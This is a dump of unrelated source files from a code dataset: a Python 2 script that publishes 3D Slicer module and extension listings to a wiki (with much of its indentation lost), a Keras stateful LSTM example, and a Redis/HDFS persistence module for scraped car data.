if tester(filePath):
names.append(extractor(filePath))
return names
#---------------------------------------------------------------------------
def getCLIModuleNames(buildDir):
return _getModuleNames(isCLIExecutable, extractCLIModuleName, buildDir)
#---------------------------------------------------------------------------
def getLoadableModuleNames(buildDir):
return _getModuleNames(isLoadableModule, extractLoadableModuleName, buildDir)
#---------------------------------------------------------------------------
def getScriptedModuleNames(buildDir):
return _getModuleNames(isScriptedModule, extractScriptedModuleName, buildDir)
#---------------------------------------------------------------------------
def getModuleNamesByType(modulePaths):
"""Return a dictionnary of module types and associated module names
given a list of module paths.
.. note::
Module types are indentified using keys ``cli``, ``loadable`` and ``scripted``.
"""
results = {
'cli':[],
'loadable':[],
'scripted':[]
}
for path in modulePaths:
results['cli'].extend(getCLIModuleNames(path))
results['loadable'].extend(getLoadableModuleNames(path))
results['scripted'].extend(getScriptedModuleNames(path))
return results
#---------------------------------------------------------------------------
def getBuiltinModulesFromBuildDir(slicerBuildDir, slicerMajorMinorVersion=None):
"""Return list of Slicer built-in module.
"""
if slicerMajorMinorVersion is None:
slicerMajorMinorVersion = getSlicerMajorMinorVersion(getSlicerVersion(slicerBuildDir))
return getModuleNamesByType(getModuleDirectories(slicerBuildDir, slicerMajorMinorVersion))
#---------------------------------------------------------------------------
def getExtensionModuleDirectoriesFromBuildDirs(slicerBuildDir, slicerExtensionsIndexBuildDir, slicerMajorMinorVersion=None):
"""Return a dictionnary of extension names with corresponding module directories.
"""
data = {}
if slicerMajorMinorVersion is None:
slicerMajorMinorVersion = getSlicerMajorMinorVersion(getSlicerVersion(slicerBuildDir))
print("\nCollecting extension module directories")
for dirname in os.listdir(slicerExtensionsIndexBuildDir):
if os.path.isdir(os.path.join(slicerExtensionsIndexBuildDir, dirname)):
if dirname.endswith('-build'):
extensionName = dirname.replace('-build', '')
data[extensionName] = getModuleDirectories(os.path.join(slicerExtensionsIndexBuildDir, dirname), slicerMajorMinorVersion)
return data
#---------------------------------------------------------------------------
def getExtensionModulesFromBuildDirs(slicerBuildDir, slicerExtensionsIndexBuildDir, slicerMajorMinorVersion=None):
"""Return a dictionnary of extension names with corresponding module names.
.. note::
Slicer built-in modules are associated with the special extension name ``builtin``.
See :func:`getBuiltinModulesFromBuildDir`
"""
if slicerMajorMinorVersion is None:
slicerMajorMinorVersion = getSlicerMajorMinorVersion(getSlicerVersion(slicerBuildDir))
data = {}
extensionModuleDirectories = getExtensionModuleDirectoriesFromBuildDirs(slicerBuildDir, slicerExtensionsIndexBuildDir, slicerMajorMinorVersion)
for extensionName, extensionModuleDirectory in extensionModuleDirectories.iteritems():
data[extensionName] = getModuleNamesByType(extensionModuleDirectory)
data['builtin'] = getBuiltinModulesFromBuildDir(slicerBuildDir, slicerMajorMinorVersion)
return data
#---------------------------------------------------------------------------
def getSlicerReleaseIdentifier(slicerVersion):
"""Return 'Nightly' if the given slicerVersion is *NOT* a release.
Otherwise return '<major>.<minor>'.
See :func:`isSlicerReleaseVersion`
"""
slicerMajorMinorVersion = getSlicerMajorMinorVersion(slicerVersion)
slicerRelease = isSlicerReleaseVersion(slicerVersion)
return ('Nightly' if not slicerRelease else slicerMajorMinorVersion)
#---------------------------------------------------------------------------
def outputFilePath(path, prefix, system=None, slicerVersion=None, withDate=False):
""" Return file name suffixed with platform name and optionally slicer
version and/or today's date::
<path>/<prefix>[_(X.Y|Nightly)]_(Linux|Darwin|Windows)[_YYYY-MM-DD].json
"""
version = ""
if slicerVersion:
version += "_" + getSlicerReleaseIdentifier(slicerVersion)
if system is None:
system = platform.system()
date = ""
if withDate:
date += "_" + datetime.date.today().isoformat()
fileName = '{0}{1}_{2}{3}.json'.format(prefix, version, system, date)
return os.path.join(path, fileName)
#---------------------------------------------------------------------------
def save(filePath, dictionnary):
"""Save dictionnary as a json file`
"""
with codecs.open(filePath, 'w', 'utf-8') as fileContents:
fileContents.write(
json.dumps(dictionnary, sort_keys=True, indent=4))
print("\nSaved '{}'".format(filePath))
return filePath
#---------------------------------------------------------------------------
def getLoadedModuleMetadata(module):
"""Return a dictionnary containing the module contributors and categories.
"""
metadata = {}
metadata['contributors'] = module.contributors
metadata['categories'] = module.categories
return metadata
#---------------------------------------------------------------------------
def getLoadedModulesMetadata():
"""Return a dictionnary containing contributors and categories for
all modules currently loaded in Slicer.
"""
import slicer
metadata = {}
moduleManager = slicer.app.moduleManager()
for moduleName in moduleManager.modulesNames():
metadata[moduleName] = getLoadedModuleMetadata(moduleManager.module(moduleName))
return metadata
#---------------------------------------------------------------------------
def getModulesMetadataFilePath(slicerVersion, system=None):
return outputFilePath(getPackagesMetadataDataDirectory(),
'slicer-modules-metadata', system=system, slicerVersion=slicerVersion)
#---------------------------------------------------------------------------
def saveLoadedModulesMetadata(slicerVersion):
"""Save metadata associated with modules loaded in Slicer.
"""
if not slicerVersion:
raise RuntimeError, "slicerVersion parameter is required"
    save(getModulesMetadataFilePath(slicerVersion), getLoadedModulesMetadata())
    # 'slicer' is only available when running inside a Slicer instance
    import slicer
    slicer.app.quit()
#---------------------------------------------------------------------------
def _saveLoadedModulesMetadata(args):
saveLoadedModulesMetadata(slicerVersion=args.slicer_version)
#---------------------------------------------------------------------------
def getExtensionModulesFilePath(slicerVersion, system=None):
return outputFilePath(getPackagesMetadataDataDirectory(),
'slicer-extension-modules', system=system, slicerVersion=slicerVersion)
#---------------------------------------------------------------------------
def getExtensionModules(slicerVersion):
cloneRepository(SLICER_PACKAGES_METADATA_GIT_URL, getPackagesMetadataTopLevelDirectory())
return mergeMetadataFiles('slicer-extension-modules_{0}'.format(
getSlicerReleaseIdentifier(slicerVersion)))
#---------------------------------------------------------------------------
def getModuleTypes(extensionModules):
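    """Return a dictionary mapping each module name to its type
    (``cli``, ``loadable`` or ``scripted``), given a dictionary of extension
    names to module names grouped by type.
    """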
moduleTypes = {}
for extensionName, extensionModuleTypes in extensionModules.iteritems():
for moduleType, moduleNames in extensionModuleTypes.iteritems():
for moduleName in moduleNames:
moduleTypes[moduleName] = moduleType
return moduleTypes
#---------------------------------------------------------------------------
def getModuleExtensions(extensionModules):
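    """Return a dictionary mapping each module name to the name of the
    extension providing it (built-in modules map to the special name ``builtin``).
    """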
moduleExtensions = {}
for extensionName, moduleTypes in extensionModules.iteritems():
for moduleType, moduleNames in moduleTypes.iteritems():
for moduleName in moduleNames:
moduleExtensions[moduleName] = extensionName
return moduleExtensions
#---------------------------------------------------------------------------
# def getModules(extensionModules):
# modules = {}
# for extensionName, moduleTypes in extensionModules.iteritems():
# for moduleType, moduleNames in moduleTypes.iteritems():
# for moduleName in moduleNames:
# #print([moduleName, extensionName, moduleType])
# modules[moduleName] = { 'extensionName' : extensionName,
# 'moduleType' : moduleType }
# return modules
#---------------------------------------------------------------------------
def saveAllExtensionsModulesMetadata(slicerBuildDir, slicerExtensionsIndexBuildDir,
updateGithub=True, slicerVersion=None):
try:
import ctk_cli
except ImportError:
runPip(['install', 'ctk_cli'], slicerBuildDir=slicerBuildDir)
import ctk_cli
if slicerVersion is None:
slicerVersion = getSlicerVersion(slicerBuildDir)
slicerMajorMinorVersion = getSlicerMajorMinorVersion(slicerVersion)
# Clone repository
repo = cloneRepository(SLICER_PACKAGES_METADATA_GIT_URL, getPackagesMetadataTopLevelDirectory())
mergedSettingsFile = mergeExtensionsLauncherAdditionalSettings(slicerExtensionsIndexBuildDir)
launcherArgs = ['--launcher-additional-settings', mergedSettingsFile]
extensionModuleDirectories = \
getExtensionModuleDirectoriesFromBuildDirs(slicerBuildDir, slicerExtensionsIndexBuildDir, slicerMajorMinorVersion).values()
# Flatten list
extensionModuleDirectories = [item for sublist in extensionModuleDirectories for item in sublist]
launcherArgs.append('--ignore-slicerrc')
# 2017-04-18 (Jc): Starting without mainwindow is not supported by some extensions
# and causes Slicer to crash.
# launcherArgs.append('--no-main-window')
launcherArgs.append('--python-script')
launcherArgs.append(os.path.realpath(__file__))
launcherArgs.append('save-loaded-modules-metadata')
launcherArgs.append('--slicer-version')
launcherArgs.append(slicerVersion)
if len(extensionModuleDirectories) > 0:
launcherArgs.append('--additional-module-paths')
launcherArgs.extend(extensionModuleDirectories)
launcher = getSlicerLauncher(slicerBuildDir)
p = slicerLauncherPopen(launcher, launcherArgs)
if p is None:
return None
print("\nSaved '{0}'".format(getModulesMetadataFilePath(slicerVersion)))
data = getExtensionModulesFromBuildDirs(slicerBuildDir, slicerExtensionsIndexBuildDir, slicerMajorMinorVersion)
save(getExtensionModulesFilePath(slicerVersion), data)
if updateGithub:
index = repo.index
index.add([getModulesMetadataFilePath(slicerVersion)])
index.add([getExtensionModulesFilePath(slicerVersion)])
msg = ("Update modules-metadata and modules-by-extension listings"
" on {0} platform for {1}".format(platform.system(), slicerVersion))
index.commit(msg)
print("\nCommit: {0}".format(msg))
repo.remotes.origin.push(repo.head)
print("\nPushed changed to '{0}'".format(SLICER_PACKAGES_METADATA_GIT_URL))
#---------------------------------------------------------------------------
def _saveAllExtensionsModulesMetadata(args):
if args.slicer_version is None:
args.slicer_version = getSlicerVersion(args.slicer_build_dir)
saveAllExtensionsModulesMetadata(
args.slicer_build_dir,
args.slicer_extension_index_build_dir,
updateGithub=not args.no_github_update,
slicerVersion=args.slicer_version)
#-----------------------------------------------------------------------
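# Note: a wiki "section" is represented below as a (title, anchor, content)
# tuple; the helpers that follow distinguish regular sections, raw content
# blocks and raw table-of-contents entries.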
def _isRegularSection(title, anchor, content):
return title and anchor and content
#-----------------------------------------------------------------------
def _isRawSection(title, anchor, content):
return not title and not anchor and content
#-----------------------------------------------------------------------
def _isRawTocEntry(title, anchor, content):
return title and not anchor and not content
#-----------------------------------------------------------------------
def createRawSection(txt):
return (None, None, [txt])
#-----------------------------------------------------------------------
def createRawTocEntry(txt):
return (txt, None, None)
#-----------------------------------------------------------------------
def generateWikiToc(sections):
lines = []
lines.append('__NOTOC__')
for (title, anchor, content) in sections:
if _isRegularSection(title, anchor, content):
lines.append("* [[{0}|{1}]]".format(anchor, title))
elif _isRawTocEntry(title, anchor, content):
lines.append(title)
return lines
#-----------------------------------------------------------------------
def generateWikiSections(sections):
lines = []
for (title, anchor, content) in sections:
if _isRegularSection(title, anchor, content) or \
_isRawSection(title, anchor, content):
lines.extend(content)
return lines
#-----------------------------------------------------------------------
def thisScriptNameAndRev():
"""
:return: Script name and script revision.
:rtype: tuple
"""
scriptName = os.path.basename(__file__)
scriptRevision = None
try:
repo = git.Repo(os.path.dirname(__file__))
scriptRevision = repo.head.commit.hexsha[:7]
except:
pass
return (scriptName, scriptRevision)
#-----------------------------------------------------------------------
def publishContentToWiki(wikiName, page, lines, comment=None):
if not comment:
(scriptName, scriptRev) = thisScriptNameAndRev()
comment = (
"This page has been updated using script {scriptName} (rev {scriptRev}).\n"
"For more details:\n"
" * https://github.com/Slicer/slicer-wiki-scripts\n"
" * https://www.slicer.org/wiki/Documentation/Nightly/Developers/Build_system/SlicerBot\n"
.format(scriptName=scriptName, scriptRev=scriptRev)
)
result = saveWikiPage(wikiName, page, comment, "\n".join(lines))
print(result)
#---------------------------------------------------------------------------
def updateWiki(slicerBuildDir, landingPage,
wikiName='slicer', updateWiki=True, slicerVersion=None):
try:
import mwclient
except ImportError:
runPip(['install', 'mwclient==0.6.5'], slicerBuildDir=slicerBuildDir)
import mwclient
# Update python path to ensure 'SlicerWizard' module can be imported
wizardPath = os.path.join(slicerBuildDir, 'bin', 'Python')
if wizardPath not in sys.path:
sys.path.append(wizardPath)
if slicerVersion is None:
slicerVersion = getSlicerVersion(slicerBuildDir)
# Clone repository hosting package metadata
cloneRepository(SLICER_PACKAGES_METADATA_GIT_URL, getPackagesMetadataTopLevelDirectory())
modulesMetadata = mergeMetadataFiles('slicer-modules-metadata_{0}'.format(
getSlicerReleaseIdentifier(slicerVersion)))
# Module -> Wiki links
moduleLinks = getModuleLinks(wikiName, modulesMetadata, slicerVersion)
# Module -> Categories
moduleCategories = getModuleCategories(modulesMetadata)
# Category[Category[...]] -> Modules
print("\nCollecting module 'categories with sub-categories'")
categoryModules = getCategoryItems(moduleCategories)
# Module -> Contributors
moduleContributors = getModuleContributors(modulesMetadata)
# Module: Collect contributing organizations and individuals
print("\nCollecting module 'contributing organizations and individuals'")
(organizationModules, individualModules,
moduleOrganizations, individualOrganizationsForModules) = \
getContributingOrganizationsAndIndividuals(moduleContributors)
# Module -> Extension
moduleExtensions = getModuleExtensions(getExtensionModules(slicerVersion))
# Module -> Type
moduleTypes = getModuleTypes(getExtensionModules(slicerVersion))
# Type -> Modules
typeModules = {}
for name in moduleTypes:
moduleType = moduleTypes[name]
if moduleType not in typeModules:
typeModules[moduleType] = []
if name in moduleLinks:
typeModules[moduleType].append(name)
# Extension -> Modules
extensionModules = {}
for name in moduleExtensions:
if name == 'builtin':
pass
moduleExtension = moduleExtensions[name]
if moduleExtension not in extensionModules:
extensionModules[moduleExtension] = []
if name in moduleLinks:
extensionModules[moduleExtension].append(name)
# Clone extension index
extensionsIndexBranch = 'master'
if isSlicerReleaseVersion(slicerVersion):
extensionsIndexBranch = getSlicerMajorMinorVersion(slicerVersion)
repo = cloneRepository(SLICER_EXTENSIONS_INDEX_GIT_URL,
getExtensionsIndexTopLevelDirectory(),
branch=extensionsIndexBranch)
# Extension -> Description files
SLICER_EXTENSIONS_SKIP = ['boost', 'Eigen']
extensionDescFiles = \
getDescriptionFiles(getExtensionsIndexTopLevelDirectory(), SLICER_EXTENSIONS_SKIP)
# Extension -> Wiki links
extensionLinks = \
generateItemWikiLinks('Extensions', wikiName, getExtensionHomepages(extensionDescFiles), slicerVersion)
# Extension -> Categories
extensionCategories = getExtensionCategories(extensionDescFiles)
# Category[Category[...]] -> Extensions
print("\nCollecting module 'categories with sub-categories'")
categoryExtensions = getCategoryItems(extensionCategories)
# Extension -> Contributors
extensionContributors = getExtensionContributors(extensionDescFiles)
# Extension: Collect contributing organizations and individuals
print("\nCollecting extension 'contributing organizations and individuals'")
(organizationExtensions, individualExtensions,
extensionOrganizations, individualOrganizationsForExtensions) = \
getContributingOrganizationsAndIndividuals(extensionContributors)
# Individual -> Organizations
individualOrganizations = _merge(dict(individualOrganizationsForExtensions), individualOrganizationsForModules)
# Extension -> Links: Working / Broken
availableExtensionLinks = \
{name: link for (name, link) in extensionLinks.iteritems() if name in extensionModules}
brokenExtensionLinks = \
{name: link for (name, link) in extensionLinks.iteritems() if name not in extensionModules}
# Category[Category[...]] -> Extensions: Working / Broken
availableExtensionCategories = \
{name: categories for (name, categories) in extensionCategories.iteritems() if name in extensionModules}
categoryAvailableExtensions = getCategoryItems(availableExtensionCategories)
brokenExtensionCategories = \
{name: categories for (name, categories) in extensionCategories.iteritems() if name not in extensionModules}
categoryBrokenExtensions = getCategoryItems(brokenExtensionCategories)
# Organization -> Extensions: Working / Broken
organizationAvailableExtensions = \
{organization: filter(lambda name: name in extensionModules, extensions) \
for (organization, extensions) in organizationExtensions.iteritems() }
organizationBrokenExtensions = \
{organization: filter(lambda name: name not in extensionModules, extensions) \
for (organization, extensions) in organizationExtensions.iteritems() }
# Individual -> Extensions: Working / Broken
individualAvailableExtensions = \
{individual: filter(lambda name: name in extensionModules, extensions) \
for (individual, extensions) in individualExtensions.iteritems() }
individualBrokenExtensions = \
{individual: filter(lambda name: name not in extensionModules, extensions) \
for (individual, extensions) in individualExtensions.iteritems() }
withSectionToc = True
#-----------------------------------------------------------------------
def _updateModuleLink(name, moduleLink):
if name in moduleExtensions:
extensionName = moduleExtensions[name]
if extensionName in extensionLinks:
extensionItem = extensionLinks[extensionName]
if moduleLinks[name]['type'] == WIKI_LINK_OFF:
moduleLink["wikilink"] = \
_generateWikiLink(extensionItem['type'],
'Extensions',
extensionName,
prettify(name),
extensionItem['url'],
slicerVersion)
return moduleLink
moduleLinks = {k:_updateModuleLink(k, v) for (k,v) in moduleLinks.iteritems()}
#-----------------------------------------------------------------------
def _excludeModule(name):
categories = moduleCategories[name]
for category in categories:
if category.split('.')[0] in ['Legacy', 'Testing', 'Developer Tools']:
return True
for subcategory in category.split('.'):
if subcategory in ['Test']:
return True
if re.search('SelfTest', name, flags=re.IGNORECASE) is not None:
return True
return False
moduleLinksFiltered = \
{k:v for (k,v) in moduleLinks.iteritems() if not _excludeModule(k)}
    # Cache dictionaries so that they can be re-used from the link renderer
setCacheEntry("extensionLinks", extensionLinks)
setCacheEntry("moduleExtensions", moduleExtensions)
setCacheEntry("moduleTypes", moduleTypes)
setCacheEntry("individualOrganizations", individualOrganizations)
moduleLinksRenderer = (headerForWikiList, moduleLinkAsListItem, footerForWikiList)
slicerReleaseIdentifier = getSlicerReleaseIdentifier(slicerVersion)
def _publishSection(section):
sections = [section]
content = []
if withSectionToc:
sections.append(createRawSection("__NOTOC__"))
content.extend(generateWikiToc(sections))
content.extend(generateWikiSections(sections))
subPage = "{0}/{1}".format(page, convertTitleToWikiAnchor(section[0]))
if updateWiki:
publishContentToWiki(wikiName, subPage, content)
return "* {}".format(wikiPageToWikiLink(subPage, section[0]))
# Wiki pages names
page = '{0}/{1}/ModuleExtensionListing'.format(landingPage, slicerReleaseIdentifier)
tocSubPage = "{0}/TOC".format(page)
sections = []
# Transclude toc subpage
if withSectionToc:
sections.append(createRawSection("__NOTOC__"))
sections.append(createRawSection("<noinclude>{{{{:{0}}}}}</noinclude>".format(tocSubPage)))
# Add sections
sections.append(itemByCategoryToWiki('Modules', moduleLinks,
categoryModules,
linksRenderer=moduleLinksRenderer,
withToc=withSectionToc))
sections.append(itemByNameToWiki('Modules',
moduleLinksFiltered,
linksRenderer=moduleLinksRenderer))
# Create one page per section
section = itemByPropertyToWiki('Modules', moduleLinks,
"contributing organization", organizationModules,
linksRenderer=moduleLinksRenderer,
withToc=withSectionToc)
sections.append(createRawTocEntry(_publishSection(section)))
section = itemByPropertyToWiki('Modules', moduleLinks,
"contributing individual", individualModules,
tocEntryRenderer=individualEntryAsWikiListItem,
linksRenderer=moduleLinksRenderer,
withToc=withSectionToc)
sections.append(createRawTocEntry(_publishSection(section)))
section = itemByPropertyToWiki('Modules', moduleLinks,
"type", typeModules,
linksRenderer=moduleLinksRenderer,
withToc=withSectionToc)
sections.append(createRawTocEntry(_publishSection(section)))
section = itemByPropertyToWiki('Modules', moduleLinks,
"extension", extensionModules,
linksRenderer=moduleLinksRenderer,
withToc=withSectionToc)
sections.append(createRawTocEntry(_publishSection(section)))
# Working extensions
section = itemByCategoryToWiki('Extensions', extensionLinks,
categoryAvailableExtensions,
withToc=withSectionToc)
sections.append(createRawTocEntry(_publishSection(section)))
section = itemByNameToWiki('Extensions', availableExtensionLinks)
sections.append(createRawTocEntry(_publishSection(section)))
section = itemByPropertyToWiki('Extensions', extensionLinks,
"contributing organization", organizationAvailableExtensions,
withToc=withSectionToc)
sections.append(createRawTocEntry(_publishSection(section)))
section = itemByPropertyToWiki('Extensions', extensionLinks,
"contributing individual", individualAvailableExtensions,
tocEntryRenderer=individualEntryAsWikiListItem,
withToc=withSectionToc)
sections.append(createRawTocEntry(_publishSection(section)))
# Add reference to list of broken extensions
brokenPage = "{0}/Broken".format(page)
brokenLink = wikiPageToWikiLink(brokenPage, "List of extensions known to be broken")
sections.append(createRawTocEntry("<br><small>{0}</small>".format(brokenLink)))
content = generateWikiSections(sections)
if updateWiki:
publishContentToWiki(wikiName, page, content)
# Generate toc subpage
if withSectionToc:
toc = generateWikiToc(sections)
if updateWiki:
publishContentToWiki(wikiName, tocSubPage, toc)
# Broken extensions
sections = []
sections.append(createRawTocEntry(
"This page lists all extensions known to be broken on "
"all supported platforms."))
sections.append(itemByCategoryToWiki('Broken extensions', extensionLinks,
categoryBrokenExtensions,
withToc=withSectionToc))
sections.append(itemByNameToWiki('Broken extensions', brokenExtensionLinks))
sections.append(itemByPropertyToWiki('Broken extensions', extensionLinks,
"contributing organization", organizationBrokenExtensions,
withToc=withSectionToc))
sections.append(itemByPropertyToWiki('Broken extensions', extensionLinks,
"contributing individual", individualBrokenExtensions,
tocEntryRenderer=individualEntryAsWikiListItem,
withToc=withSectionToc))
content = []
if withSectionToc:
content.extend(generateWikiToc(sections))
content.extend(generateWikiSections(sections))
if updateWiki:
publishContentToWiki(wikiName, brokenPage, content)
#---------------------------------------------------------------------------
def _updateWiki(args):
if args.cache_wiki_query:
loadPersistentCache()
setCacheEntry("wiki-slicer-password", args.slicer_wiki_password)
updateWiki(args.slicer_build_dir,
args.landing_page,
updateWiki=not args.no_wiki_update,
slicerVersion=args.slicer_version)
#---------------------------------------------------------------------------
setCacheEntry("wiki-slicer-username", "UpdateBot")
setCacheEntry("wiki-slicer-host", "www.slicer.org")
setCacheEntry("wiki-slicer-path", "/w/")
#---------------------------------------------------------------------------
if __name__ == '__main__':
import argparse
#=======================================================================
class VerboseErrorParser(argparse.ArgumentParser):
#-------------------------------------------------------------------
def error(self, message):
sys.stderr.write('error: %s\n' % message)
self.print_help(sys.stderr)
sys.exit(2)
#-----------------------------------------------------------------------
def _add_common_args(parser, withBuildDir=True):
if withBuildDir:
parser.add_argument('slicer_build_dir',
help='path to slicer inner build directory')
parser.add_argument('--slicer-version', dest='slicer_version', default=None,
                            help='slicer version to consider. By default, the slicer version '
                                 'is auto-discovered by running Slicer from the build directory. '
'For example: \"Slicer 4.4-Nightly\", \"Slicer 4.4\"')
parser = VerboseErrorParser(description='generate and publish Slicer extensions and modules list on the Slicer wiki')
commands = parser.add_subparsers()
#---
wiki_parser = commands.add_parser(
'update-wiki', help = 'update Slicer wiki')
_add_common_args(wiki_parser)
wiki_parser.add_argument('slicer_wiki_password',
help='slicer wiki password')
wiki_parser.add_argument('--cache-wiki-query', dest='cache_wiki_query',
action='store_true',
help='cache result of wiki query (for debugging)')
wiki_parser.add_argument('--no-wiki-update', dest='no_wiki_update',
action='store_true',
help='disable wiki update')
testLandingPage = 'User:UpdateBot/Issue-2843-Consolidated-Extension-List'
landingPage = 'Documentation'
wiki_parser.add_argument('--test-wiki-update', dest='test_wiki_update',
action='store_true',
help="update test landing page '{0}' instead of regular one '{1}'".format(
testLandingPage, landingPage))
wiki_parser.set_defaults(action=_updateWiki)
#--
save_loaded_parser = commands.add_parser(
        'save-loaded-modules-metadata', help = 'save metadata of all Slicer modules (should be used in a running Slicer instance)')
_add_common_args(save_loaded_parser, withBuildDir=False)
save_loaded_parser.set_defaults(action=_saveLoadedModulesMetadata)
#--
saveAll_parser = commands.add_parser(
'publish-extension-module-metadata', help = 'publish metadata of all Slicer modules')
_add_common_args(saveAll_parser)
saveAll_parser.add_argument('slicer_extension_index_build_dir',
help='path to slicer extension index top-level build directory')
saveAll_parser.add_argument('--no-github-update', dest='no_github_update',
action='store_true',
help='disable github update')
saveAll_parser.set_defaults(action=_saveAllExtensionsModulesMetadata)
args = parser.parse_args()
if 'slicer_extension_index_build_dir' in args:
args.slicer_extension_index_build_dir = os.path.expanduser(args.slicer_extension_index_build_dir)
if 'slicer_build_dir' in args:
args.slicer_build_dir = os.path.expanduser(args.slicer_build_dir)
if args.action == _updateWiki:
args.landing_page = landingPage
if args.test_wiki_update:
args.landing_page = testLandingPage
args.action(args)
|
[
"jchris.fillionr@kitware.com"
] |
jchris.fillionr@kitware.com
|
a59c77a0cf3cfb08626bd1b5a506208c989c883b
|
31bf5d3210534b7efa30bdade6ff869e73a85d7a
|
/LSTMparameterstudy.py
|
5e1812d8aef7ae56379054a77bae3747796d0e02
|
[] |
no_license
|
fluxtransport/solar-terrestrial
|
e8b5d3b31bcb01432d974b042ca89c0f62003cf8
|
8caa446ee0a4723ca9aaf498f6b1784059859c38
|
refs/heads/master
| 2020-12-30T10:50:46.419791
| 2017-08-15T07:43:48
| 2017-08-15T07:43:48
| 98,829,922
| 1
| 0
| null | 2017-07-30T23:08:57
| 2017-07-30T23:08:56
| null |
UTF-8
|
Python
| false
| false
| 3,298
|
py
|
'''Example script showing how to use stateful RNNs
to model long sequences efficiently. Adapted from Keras examples.
'''
from __future__ import print_function
import numpy as np
import matplotlib.pyplot as plt
from keras.models import Sequential
from keras.layers import Dense, LSTM
# since we are using stateful rnn tsteps can be set to 1
tsteps = 1
batch_size = 50
epochs = 5000
neurons = 100
length = 500
period = 100
layers = 1
# number of elements ahead that are used to make the prediction
lahead = 1
def gen_cosine_amp(amp=100, period=period, x0=0, xn=length, step=1, k=0.01):
"""Generates an absolute cosine time series with the amplitude
exponentially decreasing
Arguments:
amp: amplitude of the cosine function
period: period of the cosine function
x0: initial x of the time series
xn: final x of the time series
step: step of the time series discretization
k: exponential rate
"""
cos = np.zeros(((xn - x0) * step, 1, 1))
for i in range(len(cos)):
idx = x0 + i * step
cos[i, 0, 0] = amp * np.cos(2 * np.pi * idx / period)
cos[i, 0, 0] = cos[i, 0, 0] * np.exp(-k * idx)
return cos
print('Generating Data...')
cos = gen_cosine_amp()
print('Input shape:', cos.shape)
expected_output = np.zeros((len(cos), 1))
for i in range(len(cos) - lahead):
expected_output[i, 0] = np.mean(cos[i + 1:i + lahead + 1])
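# With lahead = 1 the target for each step is simply the next value of the
# series, i.e. the network is trained for one-step-ahead prediction.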
print('Output shape:', expected_output.shape)
print('Creating Model...')
model = Sequential()
if layers<2:
model.add(LSTM(neurons,
input_shape=(tsteps, 1),
batch_size=batch_size,
return_sequences=False,
stateful=True))
else:
model.add(LSTM(neurons,
input_shape=(tsteps, 1),
batch_size=batch_size,
return_sequences=True,
stateful=True))
for i in range(layers-2):
model.add(LSTM(neurons,
return_sequences=True,
stateful=True))
model.add(LSTM(neurons,
return_sequences=False,
stateful=True))
model.add(Dense(1))
model.compile(loss='mse', optimizer='rmsprop')
print('Training')
for i in range(epochs):
print('Epoch', i, '/', epochs)
# Note that the last state for sample i in a batch will
# be used as initial state for sample i in the next batch.
# Thus we are simultaneously training on batch_size series with
# lower resolution than the original series contained in cos.
# Each of these series are offset by one step and can be
# extracted with cos[i::batch_size].
model.fit(cos, expected_output,
batch_size=batch_size,
epochs=1,
verbose=1,
shuffle=False)
model.reset_states()
print('Predicting')
#Invert and shrink the test set!
predicted_output = model.predict(-0.5*cos, batch_size=batch_size)
print('Plotting Results')
plt.plot(-0.5*expected_output)
plt.plot(predicted_output)
plt.title('Expected and Predicted\ntsteps = '+str(tsteps)+', batch_size = '+str(batch_size)+', epochs = '+str(epochs)+'\nneurons = '+str(neurons)+', layers = '+str(layers)+', length = '+str(length)+', period = '+str(period))
plt.show()
|
[
"chandmer@nasa-16.ibm.com"
] |
chandmer@nasa-16.ibm.com
|
0a8b3737dae342147407904474dce7c0f2332844
|
7e11051b65ea60193b4058039c63eed872720f49
|
/PersistenceMangement.py
|
9171c3377d5efc2601c0af82e2d09ca20b5c325d
|
[] |
no_license
|
ljm9104/guazi_spider
|
737c87fe1664bacfb06b2ed2b65134db7bcaeb96
|
5855edeea27e87fdf56d9a34a0b25306a832a1a6
|
refs/heads/master
| 2020-03-29T08:21:12.418753
| 2018-09-18T03:30:00
| 2018-09-18T03:30:00
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,823
|
py
|
# coding=utf8
"""
author: wangjiawei
date: 2018-09-05
This module serves as the persistence module.
It listens on the ps_que queue,
fetches the data and then persists it.
"""
import time
import config
import datetime
from config import logger
from config import redis_cli
from utils import translate_2_json_dict
from utils import loads_json
from utils import write_2_file
from utils import make_set
from utils import dumps_json
from pyhdfs import HdfsClient
# Persistence queue
psm_que = config.psm_que
data_file = config.data_file
hdfs_path = config.hdfs_path
token = config.token
def listn_the_psm_que():
"""持续监听psm_que这个队列
只要一有数据过来,就做存储
"""
    # Send feedback first
    # Once startup is complete, push a "done" message to the feedback queue
    print('Persistence queue started')
que = config.task_que_fb
ctx = dumps_json({'psm': 'done'})
redis_cli.lpush(que, ctx)
while True:
if redis_cli.exists(psm_que):
            # start processing
token_set = make_set(token, blank='', index='')
msg = redis_cli.rpop(psm_que)
seed = loads_json(translate_2_json_dict(msg))
            print('{0}\tdata received'.format(datetime.datetime.today().strftime('%Y-%m-%d %H:%M:%S')))
            # Next, perform the persistence step
do_persistence(seed, token_set)
time.sleep(0.1)
def do_persistence(seed, id_set):
"""
    Perform the persistence step.
    :param seed: the record to persist
"""
data_list = seed.get('data')
for each in data_list:
if each[0] not in id_set:
ctx = []
            # Build the fields first
ctx.append(seed.get('brand_id'))
ctx.append(seed.get('brand'))
ctx.append(seed.get('serise_id'))
ctx.append(seed.get('serise'))
ctx.append(seed.get('p_type'))
ctx.extend(each)
ctx.append(seed.get('date'))
ctx.append(datetime.datetime.today().strftime('%Y-%m-%d %H:%M:%S'))
ctx.append(str(seed.get('epoh')))
            # Write the data
text = '\u0001'.join(ctx)
write_2_file(data_file, text)
            # Write to HDFS
append_2_hdfs(text)
            # Record the new token
write_2_file(token, each[0])
del ctx
else:
            print('data id already exists')
def connect_hdfs():
return HdfsClient(hosts='47.98.32.168:50070', user_name='spider')
def append_2_hdfs(text):
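    """Append one line of ``text`` to the HDFS file at ``hdfs_path``,
    creating the file first when it does not exist yet.
    """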
try:
hdfs = connect_hdfs()
        # Check whether the file already exists
if not hdfs.exists(hdfs_path):
hdfs.create(hdfs_path, (text + '\n').encode())
else:
hdfs.append(hdfs_path, (text + '\n').encode())
        logger.info('finished writing to the cluster....')
except:
        logger.warning('cluster write error')
|
[
"forme.wjw@aliyun.com"
] |
forme.wjw@aliyun.com
|
84f6829bee3e951fa4a5db4fa079b8d7c7e83f51
|
cf8506c0ddccced9cb5f8ee793f37eb7d136daa4
|
/apps/cart/migrations/0034_auto__del_shippinglabel__add_shipment__del_field_purchase_shipping_met.py
|
b39231e83b627c88f86889c4a60f4c44fefcdb89
|
[] |
no_license
|
Stunable/stella_site
|
f0dda05979db90bfced0039af949a0c983222152
|
b51bc01b4962517a312e37cc3b273693b89cfaf3
|
refs/heads/master
